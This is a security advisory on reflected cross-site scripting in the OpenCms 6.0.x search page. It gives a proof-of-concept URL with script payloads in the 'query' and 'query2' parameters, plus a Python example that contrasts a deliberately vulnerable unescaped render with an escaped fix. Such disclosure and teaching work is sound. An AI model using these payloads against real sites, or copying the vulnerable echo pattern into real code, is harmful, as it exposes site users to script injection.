


OpenCms version 6.0.x Xml Content Demo search engine Cross site scripting






Versions tested:
          - 6.0.0
          - 6.0.2
          - 6.0.3

Discovered by: jaime.blasco(at)eazel(dot).es
http://www.eazel.es

Description:
Input passed to the "query" parameter of the Xml Content Demo search engine (search.html, module org.opencms.frontend.templateone) is not properly sanitised before it is echoed back in the search results page. This can be exploited to conduct reflected cross-site scripting attacks against a user who follows a crafted link. In the proof-of-concept below the payload starts with %22%3E ("&gt;), the usual pattern for closing an HTML attribute the value is reflected into before injecting a script element; the "query2" parameter carries a second script payload.
Example:

http://host/opencms/opencms/system/modules/org.opencms.frontend.templateone/pages/search.html?action=search&query=%22%3E%3Cscript%3Ealert%28'www.eazel.es'%29%3C%2Fscript%3E%3C!-&index=Online+project+%28VFS%29&page=1&uri=%2Fxmlcontentdemo%2Fside_element_demo.html&__locale=en&query2=%3Cscript%3Ealert%28a%29%3C%2Fscript%3E
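As an added illustration (not code from the original advisory or from OpenCms), the following Python decodes the proof-of-concept URL above, echoes the "query" value into a search form the way a vulnerable template would, and then renders the same markup with HTML escaping applied on output. The two render functions are hypothetical stand-ins for the JSP page; the real markup of search.html is not shown on this page, and the value="..." attribute is assumed only because the payload's leading "&gt; is the attribute-breakout pattern.

```python
"""Reflected XSS via an echoed search parameter: the breakout pattern behind
the OpenCms search.html advisory, and the fix (HTML-escape on output).

Added example for this page; not OpenCms code. render_vulnerable() and
render_fixed() are assumed stand-ins for the template, not the real JSP.
"""
from html import escape
from urllib.parse import parse_qs, urlsplit

# The proof-of-concept URL quoted in the advisory above.
POC_URL = (
    "http://host/opencms/opencms/system/modules/org.opencms.frontend.templateone"
    "/pages/search.html?action=search"
    "&query=%22%3E%3Cscript%3Ealert%28'www.eazel.es'%29%3C%2Fscript%3E%3C!-"
    "&index=Online+project+%28VFS%29&page=1"
    "&uri=%2Fxmlcontentdemo%2Fside_element_demo.html"
    "&__locale=en&query2=%3Cscript%3Ealert%28a%29%3C%2Fscript%3E"
)


def poc_params(url: str = POC_URL) -> dict:
    """Decode the URL's query string; one value per parameter name."""
    return {name: values[0] for name, values in parse_qs(urlsplit(url).query).items()}


def render_vulnerable(query: str) -> str:
    """Hypothetical search form that echoes the query unescaped into a
    value="..." attribute and a text node (the assumed vulnerable shape)."""
    return (
        '<input type="text" name="query" value="' + query + '">\n'
        "<p>Results for: " + query + "</p>"
    )


def render_fixed(query: str) -> str:
    """Same markup, but the value is HTML-escaped on output.

    quote=True also turns " and ' into entities, so the reflected value can
    no longer terminate the attribute it is placed in."""
    safe = escape(query, quote=True)
    return (
        '<input type="text" name="query" value="' + safe + '">\n'
        "<p>Results for: " + safe + "</p>"
    )


def breaks_out(rendered: str) -> bool:
    """Crude comparison check: does a <script tag appear as markup rather
    than as escaped text in the rendered page?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    params = poc_params()
    for name in ("query", "query2"):
        print(f"{name} decoded: {params[name]!r}")
        print("vulnerable render executes script:", breaks_out(render_vulnerable(params[name])))
        print("fixed render executes script:     ", breaks_out(render_fixed(params[name])))
```

The check in breaks_out() is deliberately simple; it only serves to contrast the two renderings. The actual remedy is the one render_fixed() shows: escape every reflected parameter for the HTML context it lands in (attribute or text node) at the point of output, rather than trying to filter the input.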

Original advisory: http://www.eazel.es/media/advisory002-OpenCms-Xml-Content-Demo-search-engine-Cross-site-scripting.html

